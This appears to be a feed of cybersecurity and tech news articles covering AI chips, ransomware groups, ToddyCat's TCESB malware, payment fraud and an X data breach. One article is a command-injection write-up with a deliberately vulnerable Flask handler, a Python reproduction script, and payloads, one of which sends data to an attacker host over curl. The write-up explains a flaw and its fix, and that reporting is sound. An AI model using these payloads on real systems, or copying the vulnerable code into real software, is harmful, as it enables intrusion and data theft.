Cerebras Unveils World’s Fastest AI Chip, Beating Nvidia in Inference Speed

 

In a move that could redefine AI infrastructure, Cerebras Systems showcased its record-breaking Wafer Scale Engine (WSE) chip at Web Summit Vancouver, claiming it now holds the title of the world’s fastest AI inference engine. 

Roughly the size of a dinner plate, the latest WSE chip spans 8.5 inches (22 cm) per side and packs an astonishing 4 trillion transistors — a monumental leap from traditional processors like Intel’s Core i9 (33.5 billion transistors) or Apple’s M2 Max (67 billion). 

The result? A groundbreaking 2,500 tokens per second on Meta’s Llama 4 model, nearly 2.5 times faster than Nvidia’s recently announced benchmark of 1,000 tokens per second. “Inference is where speed matters the most,” said Naor Penso, Chief Information Security Officer at Cerebras. “Last week Nvidia hit 1,000 tokens per second — which is impressive — but today, we’ve surpassed that with 2,500 tokens per second.” 

Inference refers to how AI processes information to generate outputs like text, images, or decisions. Tokens, which can be words or characters, represent the basic units AI uses to interpret and respond. As AI agents take on more complex, multi-step tasks, inference speed becomes increasingly essential. “Agents need to break large tasks into dozens of sub-tasks and communicate between them quickly,” Penso explained. “Slow inference disrupts that entire flow.” 

What sets Cerebras apart isn’t just transistor count — it’s the chip’s design. Unlike Nvidia GPUs that require off-chip memory access, WSE integrates 44GB of high-speed RAM directly on-chip, ensuring ultra-fast data access and reduced latency. Independent benchmarks back Cerebras’ claims. 

Artificial Analysis, a third-party testing agency, confirmed the WSE achieved 2,522 tokens per second on Llama 4, outperforming Nvidia’s new Blackwell GPU (1,038 tokens/sec). “Cerebras is the only inference solution that currently outpaces Blackwell for Meta’s flagship model,” said Artificial Analysis CEO Micah Hill-Smith. 

While CPUs and GPUs have driven AI advancements for decades, Cerebras’ WSE represents a shift toward a new compute paradigm. “This isn’t x86 or ARM. It’s a new architecture designed to supercharge AI workloads,” said Julie Shin, Chief Marketing Officer at Cerebras.

AI Adoption Accelerates Despite Growing Security Concerns: Report

 

Businesses worldwide are rapidly embracing artificial intelligence (AI), yet a significant number remain deeply concerned about its security implications, according to the 2025 Thales Data Threat Report. Drawing insights from over 3,100 IT and cybersecurity professionals across 20 countries and 15 industries, the report identifies the rapid evolution of AI, particularly generative AI (GenAI), as the most pressing security threat for nearly 70% of surveyed organisations. Despite recognising AI as a major driver of innovation, many respondents expressed alarm over its risks to data integrity and trust.

Specifically, 64% highlighted concerns over AI's lack of integrity, while 57% flagged trustworthiness as a key issue. The reliance of GenAI tools on user-provided data for tasks such as training and inference further amplifies the risk of sensitive data exposure. Even with these concerns, the pace of AI adoption continues to rise. The report found that one in three organisations is actively integrating GenAI into their operations, often before implementing sufficient security measures. Spending on GenAI tools has now become the second-highest priority for organisations, trailing only cloud security investments. 

 
“The fast-evolving GenAI landscape is pressuring enterprises to move quickly, sometimes at the cost of caution, as they race to stay ahead of the adoption curve,” said Eric Hanselman, Chief Analyst at S&P Global Market Intelligence 451 Research. 

“Many enterprises are deploying GenAI faster than they can fully understand their application architectures, compounded by the rapid spread of SaaS tools embedding GenAI capabilities, adding layers of complexity and risk.” 

In response to these emerging risks, 73% of IT professionals reported allocating budgets, either new or existing, towards AI-specific security solutions. While enthusiasm for GenAI continues to surge, the Thales report serves as a warning that rushing ahead without securing systems could expose organisations to serious vulnerabilities.

“They're Just People—But Dangerous Ones”: Trellix's John Fokker Unpacks the Blurred Battlefield of Cybercrime at RSA 2025

 

At the RSA Conference 2025, John Fokker, head of threat intelligence at the Trellix Advanced Research Center, issued a stark reminder to the cybersecurity community that behind every cyberattack is a human being, and that the boundaries between criminals and nation-states are rapidly dissolving. Drawing from his experience as a former officer in the Dutch high-tech crime unit, Fokker urged cybersecurity professionals to stop viewing threats as faceless or purely technical. “Cybercriminals are not abstract concepts,” he said. “They’re individuals—ordinary people who happen to be doing bad things behind a keyboard.”

His keynote speech stressed the importance of not overlooking basic vulnerabilities in the rush to guard against sophisticated attacks. “Attackers still go for the low-hanging fruit—weak passwords, missing patches, and lack of multi-factor authentication,” he noted. A central theme of his address was the convergence of criminal networks and state-backed operations. “What once were clearly separated entities—financially motivated hackers and state actors...are now intertwined,” Fokker said. “Nation-states are increasingly using proxies or outright criminals to carry out espionage and disruption campaigns.” Fokker illustrated this through a case study involving the notorious Black Basta ransomware group. 

He referenced internal communications that surfaced in an investigation, revealing that the group’s leader, “Oleg,” was formerly known as “Tramp” in the Conti gang. Oleg was reportedly arrested upon arriving in Armenia from Moscow last year, but escaped custody just days later. According to leaked chats, he claimed Russian officials orchestrated his return using a so-called “green corridor,” allegedly coordinated by a senior government figure referred to as “number one.” While Fokker clarified that these claims remain unverified, he emphasized they are a troubling sign of potential collaboration between state entities and criminal gangs.

Still, he reminded attendees that attackers are not infallible. He recounted a failed ransomware attack by Black Basta on a U.S. healthcare organization, where the group’s encryption tool malfunctioned. “They had to fall back on threatening to leak data when the original extortion method broke down,” Fokker explained, highlighting that even seasoned attackers are prone to critical errors.

Security Researcher Uncovers Critical RCE Flaw in API Due to Incomplete Input Validation

In a recent security evaluation, a researcher discovered a severe remote code execution (RCE) vulnerability caused by improper backend input validation and misplaced reliance on frontend filters. The vulnerability centered on a username field within a target web application. 

On the surface, this field appeared to be protected by a regular expression filter—/^[a-zA-Z0-9]{1,20}$/—which was designed to accept only alphanumeric usernames up to 20 characters long. However, this filtering was enforced exclusively on the frontend via JavaScript. While this setup may prevent casual misuse through the user interface, it offered no protection once the client-side constraints were bypassed. 

The server did not replicate or enforce these restrictions, creating an opportunity for attackers to supply crafted payloads directly to the backend.

Client-Side Regex: A False Sense of Security

The researcher quickly identified a dangerous assumption built into the application’s architecture: that client-side validation would be sufficient to sanitize input. This approach led the backend to trust incoming data without question.
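
The report does not include the application's actual backend code. As a rough sketch of the pattern being described, the hypothetical Flask handler below (the /api/user endpoint, field name, and shell command are all invented for illustration) accepts the username with no server-side check and interpolates it into a shell command, which is exactly the kind of misplaced trust that enables command injection.

```python
# Hypothetical sketch of the vulnerable pattern described above; not the
# actual application code. Endpoint, field name, and command are invented.
from flask import Flask, request
import subprocess

app = Flask(__name__)

@app.route("/api/user", methods=["POST", "PUT"])
def create_user():
    # The backend assumes the frontend regex already ran, so the value is
    # accepted as-is with no server-side validation.
    username = request.form.get("username", "")

    # Untrusted input interpolated into a shell command: with shell=True,
    # a value like ";id;" ends the intended command and runs "id" instead.
    result = subprocess.run(
        f"getent passwd {username}", shell=True, capture_output=True, text=True
    )
    return result.stdout
```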

By circumventing the web interface and manually crafting HTTP requests, the researcher was able to supply malicious input that would have been blocked by the frontend regex. This demonstrated a critical weakness in security design. The researcher noted that regular expressions should be viewed as tools to assist in user input formatting, not as security mechanisms. 

When frontend validation is treated as a safeguard rather than a convenience, it opens the door to serious vulnerabilities.

Bypassing Protections via Alternate HTTP Methods

The most significant discovery came when the researcher explored alternate HTTP methods. While the application interface relied on POST requests—where regex filters were enforced—the backend also accepted PUT requests at the same endpoint. These PUT requests were not subjected to any validation, creating a dangerous inconsistency.

Using a crafted PUT request with the payload username=;id;, the researcher confirmed the ability to inject and execute arbitrary commands. The server’s response to the id command verified the successful exploitation of this oversight. Further probing revealed the potential for more advanced attacks, including out-of-band (OOB) data exfiltration. 

By submitting a payload like username=;curl http://attacker-controlled.com/$(whoami);, the researcher caused the server to initiate a connection to an external domain. This revealed the active user account running on the server, proving that the command had been executed remotely. The absence of a web application firewall (WAF) allowed this traffic to pass unnoticed, making the attack both silent and effective.  
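
As a rough illustration of the requests described above, the snippet below uses Python's requests library against a placeholder URL (the real endpoint was not disclosed); the two payloads are the ones quoted in the write-up.

```python
# Illustrative reproduction of the bypass; https://target.example/api/user
# is a placeholder for the undisclosed endpoint.
import requests

TARGET = "https://target.example/api/user"

# The frontend regex never runs: the PUT request goes straight to the
# backend, which (unlike POST in this application) applied no validation.
resp = requests.put(TARGET, data={"username": ";id;"})
print(resp.text)  # output of `id` in the response confirms code execution

# Out-of-band variant: the server itself calls out to an attacker-controlled
# host, leaking the result of `whoami` in the requested URL.
requests.put(TARGET, data={"username": ";curl http://attacker-controlled.com/$(whoami);"})
```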

Architectural Oversight and Security Best Practices

This case highlighted a widespread architectural flaw: the fragmentation of security logic between frontend and backend layers. Developers frequently assume that if an input field is restricted on the client side, it is secure—overlooking the need to apply the same or stricter rules on the server. This disconnect is what enabled the exploit.

The API processed data without verifying whether it adhered to expected formats, and alternative HTTP methods were insufficiently monitored or restricted. To address such risks, experts stress the importance of server-side validation as the primary line of defense. Every piece of input data should be rigorously checked against an allowlist of acceptable values before processing. 
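
A minimal sketch of that recommendation, under the same hypothetical Flask setup as the earlier snippet: the allowlist pattern from the frontend is enforced on the server for every HTTP method, and the value is never handed to a shell.

```python
# Hypothetical hardened version of the earlier sketch: the allowlist is
# enforced server-side and no shell command is involved.
import re
from flask import Flask, request, abort

app = Flask(__name__)

USERNAME_RE = re.compile(r"^[a-zA-Z0-9]{1,20}$")  # same rule, now authoritative

@app.route("/api/user", methods=["POST", "PUT"])
def create_user():
    username = request.form.get("username", "")

    # Server-side allowlist check applies to every method that reaches this
    # endpoint, not just the ones the web UI happens to send.
    if not USERNAME_RE.fullmatch(username):
        abort(400, description="invalid username")

    # Process the value without ever interpolating it into a shell command.
    return {"created": username}
```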

Additionally, output should be sanitized to ensure that even if unsafe input slips through, it cannot be used maliciously. Logging and monitoring are also critical, especially for API endpoints that might be vulnerable to tampering. The deployment of a robust WAF could have detected and blocked these unusual request patterns, such as command injection or OOB callbacks, thereby mitigating the threat before damage occurred.

DragonForce Unveils Cartel-Style Ransomware Model to Attract Affiliates

The ransomware landscape is seeing a shift as DragonForce, a known threat actor, introduces a new business model designed to bring various ransomware groups under a single, cartel-like umbrella. This initiative is aimed at simplifying operations for affiliates while expanding DragonForce’s reach in the cybercrime ecosystem. 

Traditionally, ransomware-as-a-service (RaaS) operations involve developers supplying the malicious tools and infrastructure, while affiliates carry out attacks and manage ransom negotiations. In exchange, developers typically receive up to 30% of the ransom collected. DragonForce’s updated model deviates from this approach by functioning more like a platform-as-a-service, offering its tools and infrastructure for a smaller cut—just 20%. 

Under this new setup, affiliates are allowed to create and operate under their own ransomware brand, all while utilizing DragonForce’s backend systems. These include data storage for exfiltrated files, tools for ransom negotiations, and malware deployment systems. This white-label model allows groups to appear as independent operations while relying on DragonForce’s infrastructure. 

A spokesperson for DragonForce told BleepingComputer that the group operates with clear rules and standards, which all affiliates are expected to follow. Any violations, they say, result in immediate removal from the network. Though these rules aren’t publicly disclosed, the group claims to maintain control since all services run on its servers. 

Interestingly, DragonForce claims it avoids certain targets in the healthcare sector, specifically facilities treating cancer and heart conditions. The group insists its motives are purely financial and not intended to harm vulnerable individuals. Cybersecurity analysts at Secureworks have noted that this new structure could appeal to both inexperienced and seasoned attackers. 

The simplified access to powerful ransomware tools, without the burden of managing infrastructure, lowers the barrier to entry and could lead to a broader adoption among cybercriminals. DragonForce has indicated its platform is open to unlimited affiliate brands capable of targeting a range of systems, including ESXi, NAS, BSD, and Windows environments. 

While the number of affiliates joining the network remains undisclosed, the group claims to have received interest from several prominent ransomware outfits. One such group, RansomBay, is already reported to be participating in the model. As this cartel-style operation gains traction, it could signal a new phase in ransomware operations—where brand diversity masks a centralised, shared infrastructure designed for profit and scalability.

ToddyCat Hackers Exploit ESET Vulnerability to Deploy Stealth Malware TCESB

 

A cyber-espionage group known as ToddyCat, believed to have ties to China, has been observed exploiting a security flaw in ESET’s software to deliver a new and previously undocumented malware strain called TCESB, according to fresh findings by cybersecurity firm Kaspersky. The flaw, tracked as CVE-2024-11859, existed in ESET’s Command Line Scanner. 

It improperly prioritized the current working directory when searching for the Windows system file “version.dll,” making it possible for attackers to substitute a malicious version of the file and gain control of the software’s behavior through a method known as DLL Search Order Hijacking. 

ESET has since released security updates in January 2025 to correct the issue, noting that attackers would still require administrative privileges to take advantage of the bug.

Kaspersky’s research linked this technique to ToddyCat activity discovered in early 2024, where the suspicious “version.dll” file was planted in temporary directories on compromised systems. TCESB, the malware delivered via this method, had not been linked to the group before. It is engineered to evade monitoring tools and security defenses by executing payloads discreetly.

TCESB is based on a modified version of the open-source tool EDRSandBlast, designed to tamper with low-level Windows kernel structures. It specifically targets mechanisms used by security solutions to track system events, effectively blinding them to malicious activity. To perform these actions, TCESB employs a Bring Your Own Vulnerable Driver (BYOVD) tactic, installing an outdated Dell driver (DBUtilDrv2.sys) that contains a known vulnerability (CVE-2021-36276). 

This method grants the malware elevated access to the system, enabling it to bypass protections and alter kernel processes. Similar drivers have been misused in the past, notably by other threat actors like the North Korea-linked Lazarus Group. Once the vulnerable driver is active, TCESB runs a loop that monitors for a payload file with a specific name. 

When the file appears, it is decrypted using AES-128 encryption and executed immediately. However, the payloads themselves were not recovered during analysis. Security analysts recommend that organizations remain vigilant by tracking the installation of drivers with known weaknesses and watching for kernel-level activity that shouldn’t typically occur, especially in environments not configured for debugging. The discovery further highlights ToddyCat’s ability to adapt and refine its tools. 

The group has been active since at least 2020, frequently targeting entities in the Asia-Pacific region with long-term, data-driven attacks.

Payment Fraud on the Rise: How Businesses Are Fighting Back with AI

The threat of payment fraud is growing rapidly, fueled by the widespread use of digital transactions and evolving cyber tactics. At its core, payment fraud refers to the unauthorized use of someone’s financial information to make illicit transactions. Criminals are increasingly leveraging hardware tools like skimmers and keystroke loggers, as well as malware, to extract sensitive data during legitimate transactions. 

As a result, companies are under mounting pressure to adopt more advanced fraud prevention systems. Credit and debit card fraud continues to dominate fraud cases globally. A recent Nilson Report found that global losses due to payment card fraud reached $33.83 billion in 2023, with nearly half of these losses affecting U.S. cardholders.

While chip-enabled cards have reduced in-person fraud, online or card-not-present (CNP) fraud has surged. Debit card fraud often results in immediate financial damage to the victim, given its direct link to bank accounts. Meanwhile, mobile payments are vulnerable to tactics like SIM swapping and mobile malware, allowing attackers to hijack user accounts. 

Other methods include wire fraud, identity theft, chargeback fraud, and even check fraud—which, despite a decline in paper check usage, remains a threat through forged or altered checks. In one recent case, customers manipulated ATM systems to deposit fake checks and withdraw funds before detection, resulting in substantial bank losses. Additionally, criminals have turned to synthetic identity creation and AI-generated impersonations to carry out sophisticated schemes.  

However, artificial intelligence is not just a tool for fraudsters—it’s also a powerful ally for defense. Financial institutions are integrating AI into their fraud detection systems. Platforms like Visa Advanced Authorization and Mastercard Decision Intelligence use real-time analytics and machine learning to assess transaction risk and flag suspicious behavior. 

AI-driven firms such as Signifyd and Riskified help businesses prevent fraud by analyzing user behavior, transaction patterns, and device data. The consequences of payment fraud extend beyond financial loss. Businesses also suffer reputational harm, resource strain, and operational disruptions. 

With nearly 60% of companies reporting fraud-related losses exceeding $5 million in 2024, preventive action is crucial. From employee training and risk assessments to AI-powered tools and multi-layered security, organizations are now investing in proactive strategies to protect themselves and their customers from the rising tide of digital fraud.

Massive Data Breach Hits Elon Musk's X Platform

 

A potentially massive data breach has reportedly compromised Elon Musk’s social media platform X, previously known as Twitter, raising significant privacy concerns for millions of users. Cybersecurity researchers from SafetyDetectives discovered a troubling post over the weekend on BreachForums, a popular site frequented by hackers. A user known as "ThinkingOne" shared a large 34 GB CSV file containing data on more than 201 million accounts. The leaked information includes metadata and private email addresses that are usually kept confidential. 

SafetyDetectives verified a sample of the data, confirming that the exposed email addresses were authentic and active. While the exact source of the breach is still unclear, experts emphasize that the size and scope of the data exposure are unprecedented. According to ThinkingOne, this recent leak represents just a small portion of a larger breach that allegedly occurred earlier this year, potentially impacting up to 2.8 billion accounts.

This bigger dataset, reported to be around 400 GB, has not yet been publicly released, and X has not acknowledged any knowledge of such a significant breach. Although the leaked dataset's size surpasses X's estimated active user base of about 400 million globally, as reported by Statista, it may include inactive or spam accounts and bots. 

Nonetheless, the leaked details, such as account creation dates, geographical information, tweet history, and display name history, are clearly linked to genuine user profiles. What raises the greatest concern is ThinkingOne's claim of merging this latest 2025 leak with email addresses obtained from a previous breach in 2023. 

The resulting dataset reportedly contains information on 201 million active users, significantly amplifying the risk of targeted phishing attacks and other malicious online activities. X, which was recently acquired by Musk’s artificial intelligence company xAI, has not yet publicly commented on the reported breach. The platform's silence amidst such a significant security issue has intensified user concerns about transparency and accountability regarding their privacy and security.